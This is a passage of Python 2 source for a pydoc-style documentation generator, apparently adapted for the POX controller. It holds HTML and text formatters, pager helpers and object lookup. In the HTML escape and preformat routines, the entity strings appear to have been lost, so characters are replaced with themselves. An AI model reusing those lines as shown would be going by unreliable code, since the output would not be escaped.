"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
return replace(text, '&', '&', '<', '<', '>', '>')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom> <br>
<font color="%s" face="helvetica, arial"> <br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
''' % (bgcol, fgcol, title, fgcol, extras or ' ')
def section(self, title, fgcol, bgcol, contents, width=6,
prelude='', marginalia=None, gap=' '):
"""Format a section with a heading."""
if marginalia is None:
marginalia = '<tt>' + ' ' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom> <br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
' ', ' ', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)/cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100/cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if modname == '__builtin__': #MM
return classname(object, object.__module__) #MM
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
url = escape(all).replace('"', '"')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getfile(object)
if path.endswith('.pyc'): path = path[:-1]
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
if path.startswith('./'): path = path[2:]
filelink = '<a href="../../hg/pox/file/tip/%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
modules = inspect.getmembers(object, inspect.ismodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name), name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0]),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
value = getattr(object, key)
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
elif thisclass.__name__ == "EventMixin":
# Special case -- don't show
attrs = inherited
continue
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
from pox.lib.revent import EventMixin
if hasattr(object, '_eventMixin_events') and issubclass(object, EventMixin):
events = list(object._eventMixin_events)
if len(events) > 0:
events.sort(key=lambda t: t.__name__)
hr.maybe()
push('<dl><dt>Class-level events:</dt>\n')
for e in events:
push('<dd>%s</dd>\n' % self.classlink(e,
object.__module__))
push('</dl>\n')
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
doc = doc and '<tt>%s<br> </tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = '<strong>%s</strong> <em>lambda</em> ' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self.document(getattr(object, name),
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0]),
classify_class_attrs(object))
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = "defined here"
else:
tag = "inherited from %s" % classname(thisclass,
object.__module__)
# Sort attrs by name.
attrs.sort()
# Pump out the attrs, segregated by kind.
attrs = spill("Methods %s:\n" % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill("Class methods %s:\n" % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill("Static methods %s:\n" % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata("Data and other attributes %s:\n" % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = '\n'.join(contents)
if not contents:
return title + '\n'
return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n'
def formatvalue(self, object):
"""Format an argument default value as text."""
return '=' + self.repr(object)
def docroutine(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a function or method object."""
realname = object.__name__
name = name or realname
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + classname(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % classname(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % classname(imclass,mod)
object = object.im_func
if name == realname:
title = self.bold(realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
skipdocs = 1
title = self.bold(name) + ' = ' + realname
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
title = self.bold(name) + ' lambda '
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + note
if skipdocs:
return decl + '\n'
else:
doc = getdoc(object) or ''
return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n')
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push(self.bold(name))
push('\n')
doc = getdoc(value) or ''
if doc:
push(self.indent(doc))
push('\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a property."""
return self._docdescriptor(name, object, mod)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce text documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None):
"""Produce text documentation for a data object."""
repr = self.repr(object)
if maxlen:
line = (name and name + ' = ' or '') + repr
chop = maxlen - len(line)
if chop < 0: repr = repr[:chop] + '...'
line = (name and self.bold(name) + ' = ' or '') + repr
if doc is not None:
line += '\n' + self.indent(str(doc))
return line
# --------------------------------------------------------- user interfaces
def pager(text):
"""The first time this is called, determine what kind of pager to use."""
global pager
pager = getpager()
pager(text)
def getpager():
"""Decide what method to use for paging through text."""
if type(sys.stdout) is not types.FileType:
return plainpager
if not sys.stdin.isatty() or not sys.stdout.isatty():
return plainpager
if 'PAGER' in os.environ:
if sys.platform == 'win32': # pipes completely broken in Windows
return lambda text: tempfilepager(plain(text), os.environ['PAGER'])
elif os.environ.get('TERM') in ('dumb', 'emacs'):
return lambda text: pipepager(plain(text), os.environ['PAGER'])
else:
return lambda text: pipepager(text, os.environ['PAGER'])
if os.environ.get('TERM') in ('dumb', 'emacs'):
return plainpager
if sys.platform == 'win32' or sys.platform.startswith('os2'):
return lambda text: tempfilepager(plain(text), 'more <')
if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0:
return lambda text: pipepager(text, 'less')
import tempfile
(fd, filename) = tempfile.mkstemp()
os.close(fd)
try:
if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0:
return lambda text: pipepager(text, 'more')
else:
return ttypager
finally:
os.unlink(filename)
def plain(text):
"""Remove boldface formatting from text."""
return re.sub('.\b', '', text)
def pipepager(text, cmd):
"""Page through text by feeding it to another program."""
pipe = os.popen(cmd, 'w')
try:
pipe.write(text)
pipe.close()
except IOError:
pass # Ignore broken pipes caused by quitting the pager program.
def tempfilepager(text, cmd):
"""Page through text by invoking a program on a temporary file."""
import tempfile
filename = tempfile.mktemp()
file = open(filename, 'w')
file.write(text)
file.close()
try:
os.system(cmd + ' "' + filename + '"')
finally:
os.unlink(filename)
def ttypager(text):
"""Page through text on a text terminal."""
lines = split(plain(text), '\n')
try:
import tty
fd = sys.stdin.fileno()
old = tty.tcgetattr(fd)
tty.setcbreak(fd)
getchar = lambda: sys.stdin.read(1)
except (ImportError, AttributeError):
tty = None
getchar = lambda: sys.stdin.readline()[:-1][:1]
try:
r = inc = os.environ.get('LINES', 25) - 1
sys.stdout.write(join(lines[:inc], '\n') + '\n')
while lines[r:]:
sys.stdout.write('-- more --')
sys.stdout.flush()
c = getchar()
if c in ('q', 'Q'):
sys.stdout.write('\r \r')
break
elif c in ('\r', '\n'):
sys.stdout.write('\r \r' + lines[r] + '\n')
r = r + 1
continue
if c in ('b', 'B', '\x1b'):
r = r - inc - inc
if r < 0: r = 0
sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n')
r = r + inc
finally:
if tty:
tty.tcsetattr(fd, tty.TCSAFLUSH, old)
def plainpager(text):
"""Simply print unformatted text. This is the ultimate fallback."""
sys.stdout.write(plain(text))
def describe(thing):
"""Produce a short description of the given thing."""
if inspect.ismodule(thing):
if thing.__name__ in sys.builtin_module_names:
return 'built-in module ' + thing.__name__
if hasattr(thing, '__path__'):
return 'package ' + thing.__name__
else:
return 'module ' + thing.__name__
if inspect.isbuiltin(thing):
return 'built-in function ' + thing.__name__
if inspect.isgetsetdescriptor(thing):
return 'getset descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.ismemberdescriptor(thing):
return 'member descriptor %s.%s.%s' % (
thing.__objclass__.__module__, thing.__objclass__.__name__,
thing.__name__)
if inspect.isclass(thing):
return 'class ' + thing.__name__
if inspect.isfunction(thing):
return 'function ' + thing.__name__
if inspect.ismethod(thing):
return 'method ' + thing.__name__
if type(thing) is types.InstanceType:
return 'instance of ' + thing.__class__.__name__
return type(thing).__name__
def locate(path, forceload=0):
"""Locate an object by name or dotted path, importing as necessary."""
parts = [part for part in split(path, '.') if part]
module, n = None, 0
while n < len(parts):
nextmodule = safeimport(join(parts[:n+1], '.'), forceload)
if nextmodule: module, n = nextmodule, n + 1
else: break
if module:
object = module
for part in parts[n:]:
try: object = getattr(object, part)
except AttributeError: return None
return object
else:
if hasattr(__builtin__, path):
return getattr(__builtin__, path)
# --------------------------------------- interactive interpreter interface
text = TextDoc()
html = HTMLDoc()
class _OldStyleClass: pass
_OLD_INSTANCE_TYPE = type(_OldStyleClass())
def resolve(thing, forceload=0):
"""Given an object or a path to an object, get the object and its name."""
if isinstance(thing, str):
object = locate(thing, forceload)
if not object:
raise ImportError, 'no Python documentation found for %r' % thing
return object, thing
else:
return thing, getattr(thing, '__name__', None)
def render_doc(thing, title='Python Library Documentation: %s', forceload=0):
